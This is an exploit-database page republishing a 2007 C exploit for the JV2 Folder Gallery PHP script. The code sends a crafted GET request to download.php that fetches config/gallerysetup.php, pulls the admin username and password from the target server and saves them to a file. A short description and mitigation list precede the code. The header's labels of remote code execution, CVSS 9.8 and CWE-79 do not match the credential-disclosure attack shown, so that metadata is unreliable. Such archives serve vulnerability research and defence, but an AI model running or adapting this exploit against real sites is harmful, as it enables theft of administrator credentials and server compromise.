header-logo
Suggest Exploit
vendor:
Folder Gallery
by:
PeTrO
9.8
CVSS
CRITICAL
Remote Code Execution
79
CWE
Product Name: Folder Gallery
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows

JV2 Folder Gallery Remote Admin Credentials Exploit

This exploit allows an attacker to retrieve the admin credentials from the JV2 Folder Gallery script. By sending a specially crafted GET request to the 'download.php' file, the attacker can download the 'gallerysetup.php' file which contains the admin credentials.

Mitigation:

1. Update the JV2 Folder Gallery script to the latest version. 2. Implement strong password policies for admin accounts. 3. Regularly monitor and log server access.
Source

Exploit-DB raw data:

/*
Script Name  :JV2 Folder Gallery
Script site  :www.jv2.net

Discovered by    :SaO 
Exploit Coded by :PeTrO 
Credits To soulreaver,Kuz3y

Compile: Visual C++ or DevC++ 
         

*/

#include <stdio.h>
#include <string.h>
#include <winsock.h>
#pragma comment(lib,"ws2_32.lib")

int main(int argc, char *argv[])
{

char gelenveri[1000];
char sendCommand[1000];
int i=0,sayac=0;

WSADATA wsdata;
SOCKET s;
struct hostent *hn;
struct sockaddr_in karsi_addr;
WSAStartup(MAKEWORD(2,0),&wsdata);



if(argc!=3)
{ 
     printf("\t**************************************************************\n"
            "\t*                                                            *\n"
            "\t*                   JV2 Folder Gallery                       *\n"                         
            "\t*        Remote Admin uName and Pass. Exploit by PeTrO       *\n"
            "\t*                                                            *\n"
            "\t*    Usage:exploit targetSite [GalleryPath]                  *\n"
            "\t*    Example:exploit localhost /gallery/                     *\n"
            "\t*                                                            *\n"
            "\t*    Discovered by    :SaO                                   *\n"
            "\t*    Exploit Coded by :PeTrO                                 *\n"
            "\t**************************************************************\n");
     
     exit(1);
}else{
      hn=gethostbyname(argv[1]);
     }

strcpy(sendCommand,"GET ");
strcat(sendCommand,argv[2]);
strcat(sendCommand,"download.php?file=config/gallerysetup.php \n\n");


printf("\n[+]Connecting....");
karsi_addr.sin_family = AF_INET;
karsi_addr.sin_port = htons(80);
karsi_addr.sin_addr =*((struct in_addr *)hn->h_addr);
memset(&(karsi_addr.sin_zero),'\0', 8);
if((s=socket(AF_INET, SOCK_STREAM, 0))==-1 ) //create a socket
{
    printf("\n[-]Socket Error");
    exit(-1);
}

if((connect(s,(struct sockaddr *)&karsi_addr,sizeof(struct sockaddr)))==-1)//connect server
{
    printf("\n[-]Connecting Error");
    exit(-1);
}

printf("\n[+]Sending command\n");
if((send(s,sendCommand,strlen(sendCommand),0))==-1)
{
    printf("\n[-]Sending Error");
    exit(-1);
}

if((recv(s,gelenveri,1000,0))==-1)
{
     printf("\n[-]Receive Error");
     exit(-1);
}

FILE *fp;

fp=fopen("data.txt","w");

for(i=0;sayac!=2;i++)
{
   if(gelenveri[i]==59) sayac++;
   
   printf("%c",gelenveri[i]);
}   
   
fprintf(fp,"%s",gelenveri);
   
WSACleanup();
return 0;
}

// milw0rm.com [2007-01-14]

Navigation

Suggest Exploit

Services By CQR